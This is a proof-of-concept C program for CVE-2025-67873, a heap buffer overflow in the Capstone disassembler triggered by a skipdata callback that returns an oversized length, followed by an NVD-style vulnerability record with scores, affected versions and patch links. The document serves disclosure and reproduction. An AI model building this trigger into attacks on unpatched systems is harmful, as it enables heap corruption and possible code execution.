CVE-2025-67873

/* * CVE-2025-67873 PoC - Capstone Skipdata Heap Buffer Overflow * This PoC demonstrates the heap buffer overflow in cs_insn.bytes when * a malicious skipdata callback returns an oversized length value. */ #include <stdio.h> #include <stdlib.h> #include <string.h> #include "capstone/capstone.h" // Malicious skipdata callback that returns oversized length static size_t malicious_skipdata(const cs_insn *insn, size_t count, void *user_data) { printf("[+] Malicious skipdata callback invoked\n"); printf("[+] Original insn->size: %u, bytes[0-3]: %02x %02x %02x %02x\n", insn->size, insn->bytes[0], insn->bytes[1], insn->bytes[2], insn->bytes[3]); // Return a length larger than 24 bytes to trigger overflow // cs_insn.bytes is typically 24 bytes, overflowing it causes heap corruption return 100; // This will cause memcpy to write 100 bytes into 24-byte buffer } int main(int argc, char **argv) { csh handle; cs_insn *insn; size_t count; // Sample x86 binary code (will trigger skipdata handling) unsigned char code[] = { 0x90, 0x90, 0x90, 0x90, // NOPs 0x0F, 0x01, 0xFF, // Invalid/extended instruction 0x66, 0x90, // Another instruction 0xCC, 0xCC, 0xCC // INT3 padding }; printf("[*] CVE-2025-67873 PoC - Capstone Heap Buffer Overflow\n"); printf("[*] Target: Capstone <= 6.0.0-Alpha5\n\n"); // Initialize Capstone in SKIPDATA mode if (cs_open(CS_ARCH_X86, CS_MODE_64, &handle) != CS_ERR_OK) { printf("[-] Failed to initialize Capstone\n"); return 1; } // Enable skipdata mode with our malicious callback cs_option(handle, CS_OPT_SKIPDATA, CS_OPT_ON); cs_option(handle, CS_OPT_SKIPDATA_MODE, CS_SKIPDATA_CALLBACK); // Set the malicious skipdata callback cs_set_skipdata_func(handle, malicious_skipdata, NULL); printf("[*] Disassembling %zu bytes of code...\n", sizeof(code)); // This call will trigger the overflow when skipdata callback returns 100 count = cs_disasm(handle, code, sizeof(code), 0x1000, 0, &insn); if (count > 0) { printf("[+] Disassembly completed, %zu instructions\n", count); for (size_t i = 0; i < count; i++) { printf(" 0x%lx: %s %s\n", insn[i].address, insn[i].mnemonic, insn[i].op_str); } cs_free(insn, count); } else { printf("[-] Disassembly failed: %s\n", cs_strerror(cs_errno(handle))); } cs_close(&handle); printf("[*] Test completed\n"); return 0; } /* * Compilation: * gcc -o poc poc.c -lcapstone * * Expected behavior: * - Heap buffer overflow when memcpy writes 100 bytes into cs_insn.bytes[24] * - May cause crash or be exploitable for code execution * * Mitigation: * - Upgrade to Capstone version with fix (commit cbef767) * - Validate skipdata callback return values */

{"cve": {"id": "CVE-2025-67873", "sourceIdentifier": "[email protected]", "published": "2025-12-17T22:16:00.147", "lastModified": "2026-01-02T18:39:54.833", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Capstone is a disassembly framework. In versions 6.0.0-Alpha5 and prior, Skipdata length is not bounds-checked, so a user-provided skipdata callback can make cs_disasm/cs_disasm_iter memcpy more than 24 bytes into cs_insn.bytes, causing a heap buffer overflow in the disassembly path. Commit cbef767ab33b82166d263895f24084b75b316df3 fixes the issue."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:L", "baseScore": 4.8, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 1.3, "impactScore": 3.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-122"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:capstone-engine:capstone:*:*:*:*:*:*:*:*", "versionEndExcluding": "6.0.0", "matchCriteriaId": "DD22C7C2-F647-4AB5-BEB4-C70F722C0419"}, {"vulnerable": true, "criteria": "cpe:2.3:a:capstone-engine:capstone:6.0.0:alpha1:*:*:*:*:*:*", "matchCriteriaId": "99F76525-F73B-4F66-AE46-A1ECAF0C7A0C"}, {"vulnerable": true, "criteria": "cpe:2.3:a:capstone-engine:capstone:6.0.0:alpha2:*:*:*:*:*:*", "matchCriteriaId": "442C7F48-5BEE-4702-AC0F-DE5C70FAA93F"}, {"vulnerable": true, "criteria": "cpe:2.3:a:capstone-engine:capstone:6.0.0:alpha3:*:*:*:*:*:*", "matchCriteriaId": "3C88415A-376C-4F7F-9D7D-3CB5C8FB9346"}, {"vulnerable": true, "criteria": "cpe:2.3:a:capstone-engine:capstone:6.0.0:alpha4:*:*:*:*:*:*", "matchCriteriaId": "67358CE5-F734-4E55-B021-D3AC5D937DD4"}, {"vulnerable": true, "criteria": "cpe:2.3:a:capstone-engine:capstone:6.0.0:alpha5:*:*:*:*:*:*", "matchCriteriaId": "9DED59B8-DC00-4323-89FA-044F7666AF5D"}]}]}], "references": [{"url": "https://github.com/capstone-engine/capstone/commit/cbef767ab33b82166d263895f24084b75b316df3", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/capstone-engine/capstone/security/advisories/GHSA-hj6g-v545-v7jg", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}, {"url": "https://github.com/capstone-engine/capstone/security/advisories/GHSA-hj6g-v545-v7jg", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Vendor Advisory"]}]}}